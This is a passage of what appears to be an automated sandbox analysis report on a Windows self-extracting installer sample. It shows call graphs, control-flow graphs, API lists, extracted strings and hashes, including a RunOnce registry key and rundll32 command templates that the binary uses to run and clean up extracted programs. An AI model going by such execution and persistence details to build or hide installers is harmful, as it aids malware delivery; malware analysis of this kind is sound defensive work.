14->38 40 Function_00007FF761F78648 14->40 62 Function_00007FF761F77D68 14->62 64 Function_00007FF761F77CE8 14->64 14->68 15 Function_00007FF761F72DB4 15->14 35 Function_00007FF761F7204C 15->35 15->38 41 Function_00007FF761F77AC8 15->41 15->46 60 Function_00007FF761F712EC 15->60 67 Function_00007FF761F73BF4 15->67 15->68 16 Function_00007FF761F77E34 17 Function_00007FF761F72834 17->1 18 Function_00007FF761F78930 19 Function_00007FF761F78B30 20 Function_00007FF761F781B0 21 Function_00007FF761F758B0 21->4 21->11 27 Function_00007FF761F751BC 21->27 21->68 71 Function_00007FF761F75770 21->71 75 Function_00007FF761F7527C 21->75 83 Function_00007FF761F75380 21->83 22 Function_00007FF761F74A30 23 Function_00007FF761F73530 23->6 23->12 23->38 53 Function_00007FF761F74A60 23->53 61 Function_00007FF761F74C68 23->61 70 Function_00007FF761F76B70 23->70 24 Function_00007FF761F778B0 24->12 24->68 26 Function_00007FF761F7473C 26->3 26->38 26->68 26->84 27->41 28 Function_00007FF761F763B8 28->12 28->36 28->68 28->88 29 Function_00007FF761F766C4 29->6 29->12 29->38 29->41 29->46 49 Function_00007FF761F764E4 29->49 63 Function_00007FF761F72468 29->63 29->68 29->84 30 Function_00007FF761F740C4 30->12 30->13 30->26 30->36 30->38 30->46 30->68 74 Function_00007FF761F779F0 30->74 77 Function_00007FF761F71684 30->77 30->84 31->12 31->68 32 Function_00007FF761F77C40 33 Function_00007FF761F73840 33->61 34 Function_00007FF761F73B40 35->12 35->35 35->68 35->78 37 Function_00007FF761F7494C 37->38 37->46 38->16 38->36 38->68 79 Function_00007FF761F77F04 38->79 38->88 39 Function_00007FF761F711CC 39->68 89 Function_00007FF761F78494 40->89 41->38 42 Function_00007FF761F72C54 42->3 42->15 42->38 57 Function_00007FF761F761EC 42->57 58 Function_00007FF761F730EC 42->58 87 Function_00007FF761F71C0C 42->87 43 Function_00007FF761F78750 44 Function_00007FF761F788D0 44->18 82 Function_00007FF761F78880 44->82 45 Function_00007FF761F77850 47 Function_00007FF761F780D0 47->2 69 Function_00007FF761F78870 47->69 48 Function_00007FF761F78964 49->6 49->12 49->28 49->68 49->70 49->84 50 Function_00007FF761F75FE4 50->10 50->38 50->46 51 Function_00007FF761F78A62 51->0 52 Function_00007FF761F78B60 53->38 53->88 54 Function_00007FF761F75C60 54->68 54->71 54->83 55 Function_00007FF761F755E0 56 Function_00007FF761F757E0 57->32 57->35 57->68 58->3 58->6 58->7 58->10 58->12 58->29 58->30 58->37 58->38 58->41 58->50 66 Function_00007FF761F73F74 58->66 58->68 58->84 93 Function_00007FF761F75D90 58->93 59 Function_00007FF761F72A6C 59->32 59->68 59->88 60->39 60->68 61->68 63->38 63->68 65 Function_00007FF761F715E8 65->64 66->38 66->41 66->46 66->84 67->16 67->17 67->38 67->68 67->79 68->89 70->12 70->38 70->84 70->88 72 Function_00007FF761F75870 73 Function_00007FF761F733F0 73->61 74->12 74->68 75->38 75->88 76->36 76->38 76->68 77->12 77->36 77->38 77->59 77->62 77->65 77->68 77->78 77->88 79->68 80 Function_00007FF761F78802 81 Function_00007FF761F78200 81->42 81->44 81->48 83->38 85 Function_00007FF761F71500 85->61 85->68 86 Function_00007FF761F77E00 87->38 87->68 90 Function_00007FF761F78790 91 Function_00007FF761F78910 92 Function_00007FF761F75690 92->34 93->38 93->46 93->54 94 Function_00007FF761F73910 94->34 94->38 94->61

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 7ff761f740c4-7ff761f74116 1 7ff761f74139-7ff761f74141 0->1 2 7ff761f74118-7ff761f74133 call 7ff761f75050 0->2 4 7ff761f74145-7ff761f74167 memset 1->4 2->1 9 7ff761f74254-7ff761f7427d call 7ff761f74dcc 2->9 6 7ff761f7416d-7ff761f74188 call 7ff761f75050 4->6 7 7ff761f74282-7ff761f74295 4->7 6->9 18 7ff761f7418e-7ff761f74194 6->18 8 7ff761f74299-7ff761f742a3 7->8 12 7ff761f742b7-7ff761f742c2 8->12 13 7ff761f742a5-7ff761f742ab 8->13 21 7ff761f744ee 9->21 17 7ff761f742c5-7ff761f742c8 12->17 13->12 16 7ff761f742ad-7ff761f742b5 13->16 16->8 16->12 22 7ff761f742ca-7ff761f742e2 call 7ff761f75050 17->22 23 7ff761f74328-7ff761f7433d call 7ff761f71684 17->23 19 7ff761f7419d-7ff761f741a0 18->19 20 7ff761f74196-7ff761f7419b 18->20 25 7ff761f741ad-7ff761f741af 19->25 26 7ff761f741a2-7ff761f741ab 19->26 24 7ff761f741b5 20->24 28 7ff761f744f0-7ff761f7451f call 7ff761f78470 21->28 22->9 35 7ff761f742e8-7ff761f742ef 22->35 23->21 36 7ff761f74343-7ff761f7434a 23->36 30 7ff761f741b8-7ff761f741bb 24->30 25->30 31 7ff761f741b1 25->31 26->24 30->17 37 7ff761f741c1-7ff761f741cb 30->37 31->24 39 7ff761f745d8-7ff761f745df 35->39 40 7ff761f742f5-7ff761f74322 CompareStringA 35->40 41 7ff761f7434c-7ff761f74353 36->41 42 7ff761f7436a-7ff761f7436c 36->42 43 7ff761f741cd-7ff761f741d0 37->43 44 7ff761f74231-7ff761f74234 37->44 49 7ff761f7472d-7ff761f7472f 39->49 50 7ff761f745e5-7ff761f745ec 39->50 40->23 40->39 41->42 46 7ff761f74355-7ff761f7435c 41->46 51 7ff761f74493-7ff761f7449b 42->51 52 7ff761f74372-7ff761f74379 42->52 47 7ff761f741db-7ff761f741dd 43->47 48 7ff761f741d2-7ff761f741d9 43->48 44->23 45 7ff761f7423a-7ff761f74252 call 7ff761f75050 44->45 45->9 45->17 46->42 56 7ff761f7435e-7ff761f74360 46->56 47->21 58 7ff761f741e3 47->58 57 7ff761f741ea-7ff761f741fb call 7ff761f75050 48->57 49->28 50->49 59 7ff761f745f2-7ff761f74621 RegOpenKeyExA 50->59 54 7ff761f7449d-7ff761f744a4 call 7ff761f7473c 51->54 55 7ff761f744df-7ff761f744e9 LocalFree 51->55 60 7ff761f74599-7ff761f745d3 call 7ff761f74dcc LocalFree 52->60 61 7ff761f7437f-7ff761f74381 52->61 69 7ff761f744a9-7ff761f744ab 54->69 55->21 56->52 65 7ff761f74362-7ff761f74365 call 7ff761f71d28 56->65 57->9 80 7ff761f741fd-7ff761f7422d CompareStringA 57->80 58->57 59->49 66 7ff761f74627-7ff761f74666 RegQueryValueExA 59->66 60->21 61->51 68 7ff761f74387-7ff761f7438e 61->68 65->42 72 7ff761f7471c-7ff761f74728 RegCloseKey 66->72 73 7ff761f7466c-7ff761f7469b memset GetSystemDirectoryA 66->73 68->51 75 7ff761f74394-7ff761f7439f call 7ff761f779f0 68->75 69->55 77 7ff761f744ad-7ff761f744c3 LocalFree 69->77 72->49 78 7ff761f7469d-7ff761f746ae call 7ff761f77ba8 73->78 79 7ff761f746b3-7ff761f746dc call 7ff761f7114c 73->79 85 7ff761f743a5-7ff761f743c1 GetProcAddress 75->85 86 7ff761f74574-7ff761f74597 call 7ff761f74dcc 75->86 77->39 83 7ff761f744c9-7ff761f744ce 77->83 78->79 90 7ff761f746e3-7ff761f746ea 79->90 80->44 83->4 88 7ff761f743c7-7ff761f74415 85->88 89 7ff761f74521-7ff761f7454e call 7ff761f74dcc FreeLibrary 85->89 99 7ff761f74553-7ff761f7456f LocalFree call 7ff761f77700 86->99 92 7ff761f74417-7ff761f7441b 88->92 93 7ff761f7441f-7ff761f74427 88->93 89->99 90->90 94 7ff761f746ec-7ff761f74717 RegSetValueExA 90->94 92->93 97 7ff761f74429-7ff761f7442d 93->97 98 7ff761f74431-7ff761f74433 93->98 94->72 97->98 102 7ff761f7443d-7ff761f74445 98->102 103 7ff761f74435-7ff761f74439 98->103 99->21 105 7ff761f74447-7ff761f7444b 102->105 106 7ff761f7444f-7ff761f74451 102->106 103->102 105->106 107 7ff761f7445b-7ff761f7447e 106->107 108 7ff761f74453-7ff761f74457 106->108 110 7ff761f744d3-7ff761f744da FreeLibrary 107->110 111 7ff761f74480-7ff761f74491 FreeLibrary 107->111 108->107 110->55 111->77
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                      • String ID: <None>$ADMQCMD$Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                      • API String ID: 2679723528-2275013900
                                                                                                                      • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                      • Instruction ID: 15f20a37efdab4df4754985a9e1989324969b74790258a945e08fc4ca53c51ba
                                                                                                                      • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                      • Instruction Fuzzy Hash: 85028D71A0A642C6EB20AF10F8486F9B7A0FB85B54FD41135EA5D43AA4DFBCE545C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                      • API String ID: 178549006-3726664654
                                                                                                                      • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                      • Instruction ID: 9a39f525303486e071f732536010681e1f33905217a97812ae93ae9b56584f31
                                                                                                                      • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                      • Instruction Fuzzy Hash: 28814D32A09A82C6E710AB21F8586F9F7A1FB89F54F845135EA4E43754DFBCE119C710

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 144 7ff761f71684-7ff761f716ce 145 7ff761f716d3-7ff761f716dd 144->145 146 7ff761f716f2-7ff761f71704 145->146 147 7ff761f716df-7ff761f716e5 145->147 149 7ff761f71706-7ff761f71711 146->149 150 7ff761f71713-7ff761f7171a 146->150 147->146 148 7ff761f716e7-7ff761f716f0 147->148 148->145 148->146 151 7ff761f7171e-7ff761f7173c call 7ff761f715e8 149->151 150->151 154 7ff761f7173e 151->154 155 7ff761f717aa-7ff761f717c2 151->155 157 7ff761f71741-7ff761f71748 154->157 156 7ff761f717c7-7ff761f717d1 155->156 158 7ff761f717e6-7ff761f717ff call 7ff761f77ba8 156->158 159 7ff761f717d3-7ff761f717d9 156->159 157->157 160 7ff761f7174a-7ff761f7174e 157->160 166 7ff761f71804-7ff761f71814 call 7ff761f77d68 158->166 159->158 161 7ff761f717db-7ff761f717e4 159->161 160->155 163 7ff761f71750-7ff761f71757 160->163 161->156 161->158 164 7ff761f7175e-7ff761f71760 163->164 165 7ff761f71759-7ff761f7175c 163->165 164->155 168 7ff761f71762-7ff761f71764 164->168 165->164 167 7ff761f71766-7ff761f71776 165->167 172 7ff761f71a1b-7ff761f71a2b call 7ff761f77d68 166->172 173 7ff761f7181a-7ff761f71847 CompareStringA 166->173 171 7ff761f7177b-7ff761f71785 167->171 168->155 168->167 174 7ff761f7179a-7ff761f717a8 171->174 175 7ff761f71787-7ff761f7178d 171->175 184 7ff761f71acb-7ff761f71ae9 LocalAlloc 172->184 185 7ff761f71a31-7ff761f71a5e CompareStringA 172->185 173->172 176 7ff761f7184d-7ff761f71861 GetFileAttributesA 173->176 174->166 175->174 177 7ff761f7178f-7ff761f71798 175->177 179 7ff761f71867-7ff761f7186f 176->179 180 7ff761f719f3-7ff761f719fb 176->180 177->171 177->174 179->180 182 7ff761f71875-7ff761f71891 call 7ff761f715e8 179->182 183 7ff761f71a00-7ff761f71a16 call 7ff761f74dcc 180->183 198 7ff761f718b5-7ff761f718d1 LocalAlloc 182->198 199 7ff761f71893-7ff761f718b0 call 7ff761f715e8 182->199 200 7ff761f71bda-7ff761f71c03 call 7ff761f78470 183->200 188 7ff761f71aeb-7ff761f71aff GetFileAttributesA 184->188 189 7ff761f71aa2-7ff761f71aad 184->189 185->184 190 7ff761f71a60-7ff761f71a67 185->190 193 7ff761f71b7e-7ff761f71b88 188->193 194 7ff761f71b01-7ff761f71b03 188->194 189->183 195 7ff761f71a6a-7ff761f71a71 190->195 197 7ff761f71b8f-7ff761f71b99 193->197 194->193 201 7ff761f71b05-7ff761f71b16 194->201 195->195 196 7ff761f71a73 195->196 202 7ff761f71a78-7ff761f71a7f 196->202 203 7ff761f71bae-7ff761f71bb9 197->203 204 7ff761f71b9b-7ff761f71ba1 197->204 198->189 206 7ff761f718d7-7ff761f7194d GetPrivateProfileIntA GetPrivateProfileStringA 198->206 199->198 207 7ff761f71b1d-7ff761f71b27 201->207 202->202 209 7ff761f71a81-7ff761f71aa0 LocalAlloc 202->209 211 7ff761f71bbc-7ff761f71bcc call 7ff761f72a6c 203->211 204->203 210 7ff761f71ba3-7ff761f71bac 204->210 212 7ff761f71984-7ff761f71993 206->212 213 7ff761f7194f-7ff761f7197f call 7ff761f71008 * 2 206->213 214 7ff761f71b3c-7ff761f71b4d 207->214 215 7ff761f71b29-7ff761f71b2f 207->215 209->189 219 7ff761f71ab2-7ff761f71ac6 call 7ff761f7114c 209->219 210->197 210->203 227 7ff761f71bd1-7ff761f71bd5 211->227 217 7ff761f719ba 212->217 218 7ff761f71995-7ff761f719b8 GetShortPathNameA 212->218 213->227 214->211 223 7ff761f71b4f-7ff761f71b52 214->223 215->214 222 7ff761f71b31-7ff761f71b3a 215->222 225 7ff761f719c1-7ff761f719ee call 7ff761f7114c 217->225 218->225 219->227 222->207 222->214 223->211 224 7ff761f71b54-7ff761f71b7c call 7ff761f71084 * 2 223->224 224->211 225->227 227->200
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                      • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                      • API String ID: 383838535-3544074861
                                                                                                                      • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                      • Instruction ID: 63c637876df6fb2511652f20ddfec449fa0725421f4eb0a4fd31cc458176414c
                                                                                                                      • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                      • Instruction Fuzzy Hash: 28E18C62A0E682C5EB21AF24B4182FAB7B1FB45B54FD44135EA4D03795DFBDD50AC320

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 238 7ff761f766c4-7ff761f76724 call 7ff761f75050 LocalAlloc 241 7ff761f76756-7ff761f7676a call 7ff761f75050 238->241 242 7ff761f76726-7ff761f76749 call 7ff761f74dcc call 7ff761f77700 238->242 247 7ff761f7676c-7ff761f767a3 call 7ff761f74dcc LocalFree 241->247 248 7ff761f767a5-7ff761f767ea lstrcmpA LocalFree 241->248 254 7ff761f7674f-7ff761f76751 242->254 247->254 251 7ff761f767ec-7ff761f767ee 248->251 252 7ff761f76837-7ff761f7683d 248->252 258 7ff761f767fb 251->258 259 7ff761f767f0-7ff761f767f9 251->259 255 7ff761f76843-7ff761f76849 252->255 256 7ff761f76b14-7ff761f76b38 call 7ff761f77ac8 252->256 260 7ff761f76b3a-7ff761f76b66 call 7ff761f78470 254->260 255->256 262 7ff761f7684f-7ff761f76870 GetTempPathA 255->262 256->260 263 7ff761f767fe-7ff761f7680e call 7ff761f764e4 258->263 259->258 259->263 266 7ff761f768ad-7ff761f768b9 262->266 267 7ff761f76872-7ff761f7687e call 7ff761f764e4 262->267 274 7ff761f76814-7ff761f76832 call 7ff761f74dcc 263->274 275 7ff761f76b0f-7ff761f76b12 263->275 272 7ff761f768bc-7ff761f768bf 266->272 273 7ff761f76883-7ff761f76885 267->273 276 7ff761f768c4-7ff761f768ce 272->276 273->275 279 7ff761f7688b-7ff761f76895 call 7ff761f72468 273->279 274->254 275->260 277 7ff761f768e1-7ff761f768f3 276->277 278 7ff761f768d0-7ff761f768d5 276->278 283 7ff761f76adb-7ff761f76b04 GetWindowsDirectoryA call 7ff761f76ca4 277->283 284 7ff761f768f9-7ff761f7690f GetDriveTypeA 277->284 278->277 282 7ff761f768d7-7ff761f768df 278->282 279->266 292 7ff761f76897-7ff761f768a7 call 7ff761f764e4 279->292 282->276 282->277 283->254 297 7ff761f76b0a 283->297 286 7ff761f76916-7ff761f7692a GetFileAttributesA 284->286 287 7ff761f76911-7ff761f76914 284->287 290 7ff761f76930-7ff761f76933 286->290 291 7ff761f769bd-7ff761f769d0 call 7ff761f76ca4 286->291 287->286 287->290 294 7ff761f769ad 290->294 295 7ff761f76935-7ff761f7693f 290->295 303 7ff761f769f4-7ff761f76a00 call 7ff761f72468 291->303 304 7ff761f769d2-7ff761f769de call 7ff761f72468 291->304 292->266 292->275 300 7ff761f769b1-7ff761f769b8 294->300 295->300 301 7ff761f76941-7ff761f76953 295->301 297->272 306 7ff761f76ad2-7ff761f76ad5 300->306 301->300 305 7ff761f76955-7ff761f76981 GetDiskFreeSpaceA 301->305 314 7ff761f76a16-7ff761f76a3e call 7ff761f77ba8 GetFileAttributesA 303->314 315 7ff761f76a02-7ff761f76a11 GetWindowsDirectoryA 303->315 304->294 313 7ff761f769e0-7ff761f769f2 call 7ff761f76ca4 304->313 305->294 309 7ff761f76983-7ff761f769a4 MulDiv 305->309 306->283 306->284 309->294 312 7ff761f769a6-7ff761f769ab 309->312 312->291 312->294 313->294 313->303 320 7ff761f76a55 314->320 321 7ff761f76a40-7ff761f76a53 CreateDirectoryA 314->321 315->314 322 7ff761f76a58-7ff761f76a5a 320->322 321->322 323 7ff761f76a6d-7ff761f76a8e SetFileAttributesA 322->323 324 7ff761f76a5c-7ff761f76a6b 322->324 325 7ff761f76a91-7ff761f76a9b 323->325 324->306 326 7ff761f76a9d-7ff761f76aa3 325->326 327 7ff761f76aaf-7ff761f76acc call 7ff761f764e4 325->327 326->327 328 7ff761f76aa5-7ff761f76aad 326->328 327->275 331 7ff761f76ace 327->331 328->325 328->327 331->306
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                      • API String ID: 3973824516-2740620654
                                                                                                                      • Opcode ID: 27d35e7384e6713e219a42e7dfd4cde3bd40dee3fa6d05908367947fe1441dc0
                                                                                                                      • Instruction ID: 6d9bf8b7cec8415b8aaed1215963fc163016b199de5b248a6c1d0d69d536285e
                                                                                                                      • Opcode Fuzzy Hash: 27d35e7384e6713e219a42e7dfd4cde3bd40dee3fa6d05908367947fe1441dc0
                                                                                                                      • Instruction Fuzzy Hash: F3D18022A1A682C6FB10AB20B4586FAF7A1FB85F50FD44135FA4E43695DFBDE405C720

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 332 7ff761f72db4-7ff761f72e4d call 7ff761f78b09 memset * 2 call 7ff761f75050 337 7ff761f730a5 332->337 338 7ff761f72e53-7ff761f72e94 CreateEventA SetEvent call 7ff761f75050 332->338 340 7ff761f730aa-7ff761f730b9 call 7ff761f74dcc 337->340 343 7ff761f72e96-7ff761f72ea0 338->343 344 7ff761f72ec3-7ff761f72ecb 338->344 345 7ff761f730be 340->345 348 7ff761f72ea2-7ff761f72ebe call 7ff761f74dcc 343->348 346 7ff761f72ecd-7ff761f72ecf 344->346 347 7ff761f72ed5-7ff761f72ef0 call 7ff761f75050 344->347 349 7ff761f730c0-7ff761f730e3 call 7ff761f78470 345->349 346->347 350 7ff761f72fa3-7ff761f72fb3 call 7ff761f770a8 346->350 359 7ff761f72efe-7ff761f72f1c CreateMutexA 347->359 360 7ff761f72ef2-7ff761f72efc 347->360 348->345 361 7ff761f72fb5-7ff761f72fbf 350->361 362 7ff761f72fc4-7ff761f72fcb 350->362 359->350 363 7ff761f72f22-7ff761f72f33 GetLastError 359->363 360->348 361->340 364 7ff761f72fcd-7ff761f72fd9 call 7ff761f7204c 362->364 365 7ff761f72fde-7ff761f72ffd FindResourceExA 362->365 363->350 366 7ff761f72f35-7ff761f72f48 363->366 364->345 368 7ff761f73014-7ff761f7301b 365->368 369 7ff761f72fff-7ff761f73011 LoadResource 365->369 370 7ff761f72f4a-7ff761f72f60 call 7ff761f74dcc 366->370 371 7ff761f72f62-7ff761f72f7f call 7ff761f74dcc 366->371 374 7ff761f7301d-7ff761f73024 #17 368->374 375 7ff761f73029-7ff761f73030 368->375 369->368 381 7ff761f72f81-7ff761f72f9e CloseHandle 370->381 371->350 371->381 374->375 378 7ff761f7303a-7ff761f73044 call 7ff761f73bf4 375->378 379 7ff761f73032-7ff761f73035 375->379 378->345 384 7ff761f73046-7ff761f73055 378->384 379->349 381->345 384->379 385 7ff761f73057-7ff761f73061 384->385 385->379 386 7ff761f73063-7ff761f7306a 385->386 386->379 387 7ff761f7306c-7ff761f73073 call 7ff761f712ec 386->387 387->379 390 7ff761f73075-7ff761f730a1 call 7ff761f77ac8 387->390 390->345 393 7ff761f730a3 390->393 393->379
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                      • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                                      • API String ID: 3100096412-78895606
                                                                                                                      • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                                      • Instruction ID: f2ffc741c5fabbf73c108c32f983e445c056ec055adbd91e1a85139cd19a8568
                                                                                                                      • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                                      • Instruction Fuzzy Hash: 5D815A21A0A643C6F721BB24B8187F9A7A0BF89F54FC45039F94E426A5DFFCA445C720

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 394 7ff761f76ca4-7ff761f76d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff761f76d12-7ff761f76d3a call 7ff761f74dcc call 7ff761f77700 394->395 396 7ff761f76d3f-7ff761f76d7a GetDiskFreeSpaceA 394->396 411 7ff761f76fe9 395->411 397 7ff761f76f63-7ff761f76fb8 memset call 7ff761f77700 GetLastError FormatMessageA 396->397 398 7ff761f76d80-7ff761f76da8 MulDiv 396->398 408 7ff761f76fbd-7ff761f76fe4 call 7ff761f74dcc SetCurrentDirectoryA 397->408 398->397 401 7ff761f76dae-7ff761f76de4 GetVolumeInformationA 398->401 405 7ff761f76e45-7ff761f76e68 SetCurrentDirectoryA 401->405 406 7ff761f76de6-7ff761f76e40 memset call 7ff761f77700 GetLastError FormatMessageA 401->406 410 7ff761f76e6c-7ff761f76e73 405->410 406->408 408->411 414 7ff761f76e75-7ff761f76e7a 410->414 415 7ff761f76e86-7ff761f76e99 410->415 417 7ff761f76feb-7ff761f7701a call 7ff761f78470 411->417 414->415 418 7ff761f76e7c-7ff761f76e84 414->418 419 7ff761f76e9d-7ff761f76ea0 415->419 418->410 418->415 421 7ff761f76eae-7ff761f76eb2 419->421 422 7ff761f76ea2-7ff761f76eac 419->422 423 7ff761f76ed8-7ff761f76edf 421->423 424 7ff761f76eb4-7ff761f76ed3 call 7ff761f74dcc 421->424 422->419 422->421 427 7ff761f76f0e-7ff761f76f1f 423->427 428 7ff761f76ee1-7ff761f76ee9 423->428 424->411 431 7ff761f76f22-7ff761f76f2a 427->431 428->427 430 7ff761f76eeb-7ff761f76f0c 428->430 430->431 432 7ff761f76f2c-7ff761f76f30 431->432 433 7ff761f76f46-7ff761f76f49 431->433 434 7ff761f76f32 432->434 435 7ff761f76f4b-7ff761f76f4d 433->435 436 7ff761f76f4f-7ff761f76f52 433->436 437 7ff761f76f54-7ff761f76f5e 434->437 438 7ff761f76f34-7ff761f76f41 call 7ff761f724f8 434->438 435->434 436->434 437->417 438->417
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
